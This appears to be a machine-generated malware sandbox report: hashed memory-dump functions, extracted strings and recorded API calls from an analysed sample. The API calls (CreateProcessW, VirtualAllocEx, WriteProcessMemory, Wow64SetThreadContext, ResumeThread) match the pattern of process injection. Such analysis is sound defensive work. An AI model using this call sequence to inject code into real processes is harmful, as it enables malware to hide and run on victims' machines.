                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fdb7d707bfb810f5df00f82c864abeeaa696ead8f0d0a910a905ed1ae805a211
                                                                                        • Instruction ID: 1e09662a72e4fdf13a0a36f5573b4f5957d250e2de5cd571309b9d6cc1acb518
                                                                                        • Opcode Fuzzy Hash: fdb7d707bfb810f5df00f82c864abeeaa696ead8f0d0a910a905ed1ae805a211
                                                                                        • Instruction Fuzzy Hash: 5DF04F759052449EEB208E19DC88B66FF98EF51724F18C45AED085B686C3799844CBB2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Executed Functions

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: TNBl
                                                                                        • API String ID: 0-2573526999
                                                                                        • Opcode ID: 0ed761c15296bf36dd19ee9c0bdb1f0333f409b98af49f9163ed17188d227105
                                                                                        • Instruction ID: c35bc69aad0ef4ed2a7c9e9f07149474c04e8e3b5a6a68cf0964418510c498db
                                                                                        • Opcode Fuzzy Hash: 0ed761c15296bf36dd19ee9c0bdb1f0333f409b98af49f9163ed17188d227105
                                                                                        • Instruction Fuzzy Hash: E523D434A00619CFCB14EF64C998EE9B7B2BF8A305F1145E9D409AB361DB35AE85CF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: TNBl
                                                                                        • API String ID: 0-2573526999
                                                                                        • Opcode ID: e2612f45b3c6d7de17f4826c013113727b6136c9c24027997d7d61c2c4a3889e
                                                                                        • Instruction ID: 76dbcea189372596fff2320ec8a9c0a1a4176f5d824b700602b8829da847fc98
                                                                                        • Opcode Fuzzy Hash: e2612f45b3c6d7de17f4826c013113727b6136c9c24027997d7d61c2c4a3889e
                                                                                        • Instruction Fuzzy Hash: DB23D434A00619CFCB14EF64C998EE9B7B2BF8A305F1145E9D409AB361DB35AE85CF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 51e7b1ff36acd1c9b64c72dc9ffbb94514baa9541377dde9bbc8fb43ed4e6edb
                                                                                        • Instruction ID: c860cbd1fe6afbc493488467f494f62a7169e2580814cebc284694c5e5986c69
                                                                                        • Opcode Fuzzy Hash: 51e7b1ff36acd1c9b64c72dc9ffbb94514baa9541377dde9bbc8fb43ed4e6edb
                                                                                        • Instruction Fuzzy Hash: 5981C5B4E11218CFDB08CFAAC884ADEBBB2EF89300F24942AD519BB364D7755945CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 77d6742f454996a108fcd8b733b27fce3dbb27b9d39b535273e2d78dc2dd3626
                                                                                        • Instruction ID: 07054a8ad905712529afe90246c0cf3867e56fd1ef2b08fc6113c96b027da471
                                                                                        • Opcode Fuzzy Hash: 77d6742f454996a108fcd8b733b27fce3dbb27b9d39b535273e2d78dc2dd3626
                                                                                        • Instruction Fuzzy Hash: DC81B5B4E11218CFDB08CFAAC884ADEBBB2EF89300F24942AD519AB364D7755945CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 084fd287a2660000669e54c17e94ab325b5e479a81cfb0dbb24342951fdc1885
                                                                                        • Instruction ID: ec03112f7da6da6d8ec3b81d5cd2ce52170f2fee55052071d57f02848e11e30a
                                                                                        • Opcode Fuzzy Hash: 084fd287a2660000669e54c17e94ab325b5e479a81cfb0dbb24342951fdc1885
                                                                                        • Instruction Fuzzy Hash: EF81C574E002189FDB18DFA5D990ADEBBB2FF88304F20856AE519AB365DB315D41CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6900ca1ea780bd2f55e2d8d88b16464f0bef0bab8eb95ce7c3903de1144c8ef1
                                                                                        • Instruction ID: 4b0e7617b4dcca149127f68393a5eb77adeb180c5e70cf45f8f0435ce552f998
                                                                                        • Opcode Fuzzy Hash: 6900ca1ea780bd2f55e2d8d88b16464f0bef0bab8eb95ce7c3903de1144c8ef1
                                                                                        • Instruction Fuzzy Hash: E5613C70D1424ADFCB08CFE6C4455AEFBF2AF89300F64D46AD419A72A4D7748A52CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 549a9e310080524b95913d90421e9c4fe032bf71b278f3ebe33672d2fc9c9143
                                                                                        • Instruction ID: 4829e00c71546c01d31f3a8ab4253a9faee517f7966cb133eab278a1217e5900
                                                                                        • Opcode Fuzzy Hash: 549a9e310080524b95913d90421e9c4fe032bf71b278f3ebe33672d2fc9c9143
                                                                                        • Instruction Fuzzy Hash: D651E274E042599FCB04DFAAC580AEEFBF2EF89300F64C56AD518AB355D7349942CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 18c1971f32a4e0cf9115f0ce4bc4dfb0f4e823c16ff659017a1436884b8f85b6
                                                                                        • Instruction ID: 97b02b24a08d8451ab9bdd908dcb1d5c9c1271a6accf82630ffae49a267f118c
                                                                                        • Opcode Fuzzy Hash: 18c1971f32a4e0cf9115f0ce4bc4dfb0f4e823c16ff659017a1436884b8f85b6
                                                                                        • Instruction Fuzzy Hash: 4B31DB71E056199FEB58CFABD84069EBBF3AFC9300F14C5BAD408A7264EB341A458F51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 213bc960859dd94b2cdc30ebf99f9bc1eff49e9605e82189703de62d42fa7ba0
                                                                                        • Instruction ID: 5c5128dcbcfd59cdd72c9e93aaff7aef5da80c809ba8d2d2f5887d5536c903b7
                                                                                        • Opcode Fuzzy Hash: 213bc960859dd94b2cdc30ebf99f9bc1eff49e9605e82189703de62d42fa7ba0
                                                                                        • Instruction Fuzzy Hash: 563169B0925249DFCB04CFAAC5456AEBBF2AF89300F20C4AAC005E7264D3308A51CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4ef38df5f2a4614ee4569a43d10b7f18d2ae48c90f03a9a57ee7c185151d1ede
                                                                                        • Instruction ID: 1db9f81a2b0dee22c3a0c279e5a07438efd262a9e61062c7815e4c9486fbcd79
                                                                                        • Opcode Fuzzy Hash: 4ef38df5f2a4614ee4569a43d10b7f18d2ae48c90f03a9a57ee7c185151d1ede
                                                                                        • Instruction Fuzzy Hash: C6215771E046488BDB18CFABD8406DEFBF3AFC9300F28C16AD408A6264DB341955CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PJBl$PJBl$PJBl$PJBl$PJBl$PJBl$TNBl
                                                                                        • API String ID: 0-2498673735
                                                                                        • Opcode ID: 39e02f19f91f5ac3522ff2cdc84bde7533a53a1d4d8fd8351adb5b2a67898ca3
                                                                                        • Instruction ID: 4d909307e185de33d86f96b8d4f8f72eb146c17547b8244da2fc208bda041644
                                                                                        • Opcode Fuzzy Hash: 39e02f19f91f5ac3522ff2cdc84bde7533a53a1d4d8fd8351adb5b2a67898ca3
                                                                                        • Instruction Fuzzy Hash: 3322D234E00259CFDB24DFA4C885FD9B7B2AF89304F5086A9D919AB351DB30AE85CF51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PJBl$PJBl$PJBl$TNBl
                                                                                        • API String ID: 0-3017763876
                                                                                        • Opcode ID: 3939bef0f6f412bbb54463832b743f13620e24082dff3a786b329d3d2181cedb
                                                                                        • Instruction ID: 5a681399f6b84f4bb05e8d5f3d721424deb6dfb8fcd83762c9280ee742c2ef09
                                                                                        • Opcode Fuzzy Hash: 3939bef0f6f412bbb54463832b743f13620e24082dff3a786b329d3d2181cedb
                                                                                        • Instruction Fuzzy Hash: 3612E234E00259CFDB24DFA8C845FD9B7B2AF49304F1085AAD919AB361DB30AE95CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (+@m$l0@m
                                                                                        • API String ID: 0-704468455
                                                                                        • Opcode ID: 60f68bb98706b1d6bff779c309df91f13234b4c0f6f638e7e4f0a9708178d04c
                                                                                        • Instruction ID: 4969523f9e74f2d936db3268c0c422071c1c39e4a54adb94262464f8628475f0
                                                                                        • Opcode Fuzzy Hash: 60f68bb98706b1d6bff779c309df91f13234b4c0f6f638e7e4f0a9708178d04c
                                                                                        • Instruction Fuzzy Hash: E3910474E10628CFDB14DFA9C898BADBBB2BF49304F608469D40AAB3A5DB345D45CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: `!?m$`!?m
                                                                                        • API String ID: 0-952261428
                                                                                        • Opcode ID: 90e7ec907227a84e5937b63ebb4ab16cdec1cab5d62cff83fd59361405c7f9c9
                                                                                        • Instruction ID: 58ef096d861fc4beb28c341efe3454984a4f4a7d8a86102247af4fa56625dce2
                                                                                        • Opcode Fuzzy Hash: 90e7ec907227a84e5937b63ebb4ab16cdec1cab5d62cff83fd59361405c7f9c9
                                                                                        • Instruction Fuzzy Hash: 3131C1B4D54249CFCB55CFAAC8486EEBBF5FB9D340F20A46AC816A7250D7344951CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01D24D24
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2335374703.0000000001D20000.00000040.00000001.sdmp, Offset: 01D20000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 9f4cb38c4c472b61c127112e81f05aa0a23fc06e2456096ebafd2fc1205024e3
                                                                                        • Instruction ID: 137f87c29e6c197152c42777c3b5e6a8f6b8cc85321c1fd5c8c667209d2ca0f1
                                                                                        • Opcode Fuzzy Hash: 9f4cb38c4c472b61c127112e81f05aa0a23fc06e2456096ebafd2fc1205024e3
                                                                                        • Instruction Fuzzy Hash: 8F81D274C00229CFDB21CFA9C840BEDBBB5BF19304F1095AAE959B7250DB309A89CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01D253DE
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2335374703.0000000001D20000.00000040.00000001.sdmp, Offset: 01D20000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: 55d062680faa9b05415b2cd90539a95d33b6b7f3ebb6c356efd32649802c638c
                                                                                        • Instruction ID: 20d2c297e3a068515de7079d65a5bdd17aa1726c1ddcfde965c0401c588565b9
                                                                                        • Opcode Fuzzy Hash: 55d062680faa9b05415b2cd90539a95d33b6b7f3ebb6c356efd32649802c638c
                                                                                        • Instruction Fuzzy Hash: 08418BB5D002589FCF10CFA9D984ADEFBF1BB59314F24942AE824B7210D375AA45CF64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01D253DE
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2335374703.0000000001D20000.00000040.00000001.sdmp, Offset: 01D20000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: 1e6415f2c09cb3014d98b7a8cfc3e2cb9762bd42541b7116052321ff30171200
                                                                                        • Instruction ID: d46b5f499cbc8ec161e4271e4cbe5fbdd6abe35cd19f49162ba2710aac228f11
                                                                                        • Opcode Fuzzy Hash: 1e6415f2c09cb3014d98b7a8cfc3e2cb9762bd42541b7116052321ff30171200
                                                                                        • Instruction Fuzzy Hash: D24189B5D002589FCF00CFA9D984ADEFBF1BB59314F24942AE818B7210D374AA45CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01D2517D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2335374703.0000000001D20000.00000040.00000001.sdmp, Offset: 01D20000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: b2b43ff5f4fc766a91494285885f5bfd2deeb525ace3645fe306a79c38f1023f
                                                                                        • Instruction ID: f3a375e528c547430e9faaa5d7f43b1299340af941c1d5e00fd3686142615892
                                                                                        • Opcode Fuzzy Hash: b2b43ff5f4fc766a91494285885f5bfd2deeb525ace3645fe306a79c38f1023f
                                                                                        • Instruction Fuzzy Hash: 2B4189B9D04258DFCF10CFA9D884ADEFBB1BB19314F20942AE814B7210D335AA45CF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01D2529D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2335374703.0000000001D20000.00000040.00000001.sdmp, Offset: 01D20000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 48f89f7131fe7417b12eb66630ac276065d32781b58ca7ae71c9fb8e5c714d69
                                                                                        • Instruction ID: f755e03f1a72df7f0ba6d51c4be6d988decd9a6c6b2037a7a7272ca58bb592bc
                                                                                        • Opcode Fuzzy Hash: 48f89f7131fe7417b12eb66630ac276065d32781b58ca7ae71c9fb8e5c714d69
                                                                                        • Instruction Fuzzy Hash: 044189B8D052589FCF10CFA9E884ADEFBB1BB1A314F20A45AE815B7310D331A945CF55
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01D2529D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2335374703.0000000001D20000.00000040.00000001.sdmp, Offset: 01D20000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: ca5a2847660fb6254742e19895886dcb4c1c7cbf33fe34c5dcdad1fb126c389a
                                                                                        • Instruction ID: 213c45d182f38a6efcfa9a3966228154671cf30843c24f9ff4945c3002f0b8af
                                                                                        • Opcode Fuzzy Hash: ca5a2847660fb6254742e19895886dcb4c1c7cbf33fe34c5dcdad1fb126c389a
                                                                                        • Instruction Fuzzy Hash: 653168B8D042589FCF10CFA9D884ADEFBB5BB1A314F20A41AE815B7310D335A905CF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 01D2505A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2335374703.0000000001D20000.00000040.00000001.sdmp, Offset: 01D20000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: c295d8b1f21d20c196aa99a7de5179f9aab05d4867f9b569f143147a1ff5407b
                                                                                        • Instruction ID: 88502023a3dbc12e38f68f950c9306a8294b7eda94a66a598c77c856303afdd3
                                                                                        • Opcode Fuzzy Hash: c295d8b1f21d20c196aa99a7de5179f9aab05d4867f9b569f143147a1ff5407b
                                                                                        • Instruction Fuzzy Hash: 4F41BBB5D002189FCB14CFA9D884ADEFBF0BB49314F24902AE418B7210D338AA45CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 01D2505A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2335374703.0000000001D20000.00000040.00000001.sdmp, Offset: 01D20000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: d5ef509e0a733632a358c9b216dddef9dd1cec08423117c2977f637046c58039
                                                                                        • Instruction ID: 4ee3445fbc07753eb761ba4836d3c8cbe9913b4c1533161a90b6c46539c4eebf
                                                                                        • Opcode Fuzzy Hash: d5ef509e0a733632a358c9b216dddef9dd1cec08423117c2977f637046c58039
                                                                                        • Instruction Fuzzy Hash: E2419AB4D012589FCB10CFA9D984ADEFBF1BB49314F24942AE428B7210D779AA45CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ResumeThread.KERNELBASE(?), ref: 01D255B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2335374703.0000000001D20000.00000040.00000001.sdmp, Offset: 01D20000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: dbb36115555cd3f75c16f9b89cff0f949b6cc7c054b779906df9be4a6bbd30c1
                                                                                        • Instruction ID: a9a013340debcdcf812668283f151333427a4aa554a1ec416f2b5871103a74a0
                                                                                        • Opcode Fuzzy Hash: dbb36115555cd3f75c16f9b89cff0f949b6cc7c054b779906df9be4a6bbd30c1
                                                                                        • Instruction Fuzzy Hash: 1E318BB8D002189FCB10CFA9E884ADEFBF4AB59314F24945AE815B7310D735A945CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: t?m
                                                                                        • API String ID: 0-326825507
                                                                                        • Opcode ID: 0353fdf8d20e9ea5939b4ae85064f0df5f732f9784570eca17ce8688e7a7e290
                                                                                        • Instruction ID: 95e1b2f1f134b2900aeb2d9a043e09ab96e3f7a1b3f68f44dae0931425cb19c4
                                                                                        • Opcode Fuzzy Hash: 0353fdf8d20e9ea5939b4ae85064f0df5f732f9784570eca17ce8688e7a7e290
                                                                                        • Instruction Fuzzy Hash: 20813570E10219DFDB24CFA5C880BDEFBB2BF89314F5484A9D508AB251DB319A85CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: \-zl
                                                                                        • API String ID: 0-31327930
                                                                                        • Opcode ID: c369e49d5150291aed06bcbb51946b3306b6999f0bfb835a5d36386e92bcfd55
                                                                                        • Instruction ID: c07f35b5742c7687229c64839e991c7ad07086599207e591fd114549edbdd9e1
                                                                                        • Opcode Fuzzy Hash: c369e49d5150291aed06bcbb51946b3306b6999f0bfb835a5d36386e92bcfd55
                                                                                        • Instruction Fuzzy Hash: 7B41D474E01218DFDB08DFA6D894A9EBBB2EF89300F14902AE805AB364DB745D46CF55
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: L
                                                                                        • API String ID: 0-2333958409
                                                                                        • Opcode ID: 880b3b6dce94b20da4c46482ec835a9fd1a5c7934437fc5a6492f77f08074926
                                                                                        • Instruction ID: 045bbf6a4139e1f6034c41a551372b7f43de889d14a0fb8ec02645e3ffdd81dc
                                                                                        • Opcode Fuzzy Hash: 880b3b6dce94b20da4c46482ec835a9fd1a5c7934437fc5a6492f77f08074926
                                                                                        • Instruction Fuzzy Hash: B201A274A00248AFC745DFA8C995A9ABFF2AF49200F05C0A5D919DB362E7349E44CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: n
                                                                                        • API String ID: 0-2795774880
                                                                                        • Opcode ID: 61ed9fa987c0f59529270787cb76078df677772271be5e6d6ec235751c09fd01
                                                                                        • Instruction ID: 6f18a4fc411358cfdf7938365eb8cfaac5ac08a537fd7f1585b75ff425be06ec
                                                                                        • Opcode Fuzzy Hash: 61ed9fa987c0f59529270787cb76078df677772271be5e6d6ec235751c09fd01
                                                                                        • Instruction Fuzzy Hash: E2010870E00318CFDB58CFAAC8449AEBBF6BF88301F148069D805A7764DB30A942CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: c;F
                                                                                        • API String ID: 0-3267592082
                                                                                        • Opcode ID: 67cf05769e0cc9abf3d3533797fc1a765e6f5a5b24f12157855767fe0ebdf159
                                                                                        • Instruction ID: 8f3732afcbefcaa1ac88aabeed237e0db6bb4748d48b6288d37d4a037f02f58b
                                                                                        • Opcode Fuzzy Hash: 67cf05769e0cc9abf3d3533797fc1a765e6f5a5b24f12157855767fe0ebdf159
                                                                                        • Instruction Fuzzy Hash: 24012170E24248DFCB44DFB4E94829DBFB1EB89310F2084BAC409D3221F6B04A98CB11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: c;F
                                                                                        • API String ID: 0-3267592082
                                                                                        • Opcode ID: bddb2e69dcc2f91c62a5325a7fd1918d88fab72e6b73d155c970036467e12fde
                                                                                        • Instruction ID: 02a9519448de05ef50d71824db3f6075589ef883452d343a623317368607dc60
                                                                                        • Opcode Fuzzy Hash: bddb2e69dcc2f91c62a5325a7fd1918d88fab72e6b73d155c970036467e12fde
                                                                                        • Instruction Fuzzy Hash: 25F0C230E64208DFCB44DFB5DA4425DBBF6EB89311F2084A5C40DD3610EB708A69DA61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ce4b4dedced3f69869001ac5f65c218a5ee2df5d0970b87da44e0f2441524243
                                                                                        • Instruction ID: c22d4da51cb7f18b6464df24a415fa4ce6115382eb14a54056ee32de6f764606
                                                                                        • Opcode Fuzzy Hash: ce4b4dedced3f69869001ac5f65c218a5ee2df5d0970b87da44e0f2441524243
                                                                                        • Instruction Fuzzy Hash: 9C81CB70909288CFCB90DFA8E89498DBFF2FF49351F1988AAD4459B362D7309954CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: af2022ddd4cce5ff7c7eab976433c5f8b334417341b5fb32a714aeadeac4481e
                                                                                        • Instruction ID: 68e1416bba06328d229b2d4c9bbcc7b7dd1c687ba30de3f14fc81c88a74667fa
                                                                                        • Opcode Fuzzy Hash: af2022ddd4cce5ff7c7eab976433c5f8b334417341b5fb32a714aeadeac4481e
                                                                                        • Instruction Fuzzy Hash: 14616574A00248DFCB94DFA8E984A8DBBF6FB88351F558969E509AB320D7309D80CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7c3fbee87c51d24280295ef0816309ac95ef00d8157173d34297ffa6a329bb4e
                                                                                        • Instruction ID: 7325359358db0f43fad51c3ca1c9f26b7a3203a273be1c05f738ced143ee4470
                                                                                        • Opcode Fuzzy Hash: 7c3fbee87c51d24280295ef0816309ac95ef00d8157173d34297ffa6a329bb4e
                                                                                        • Instruction Fuzzy Hash: 72612574A10248DFCB94DFA8E98898DBBF6FF88351F148969E509AB325D7309D40CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8e89cf5fd6e0d0875ad5f37adee94ce4ef50701fedf13d651f091373d24ed179
                                                                                        • Instruction ID: 38507668597acea9725a8bdff5b419e3ab6b48f42e80b375c1b2d07e19be64a9
                                                                                        • Opcode Fuzzy Hash: 8e89cf5fd6e0d0875ad5f37adee94ce4ef50701fedf13d651f091373d24ed179
                                                                                        • Instruction Fuzzy Hash: 4E51EE74E51218EFCB04DFA9D488AEDBBB1FF48315F5180A9E809A7361D730A9A1CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 742b4402377327bbf571410bc78c36a51a2735dcfed77b6e2db9b8b5eeac5296
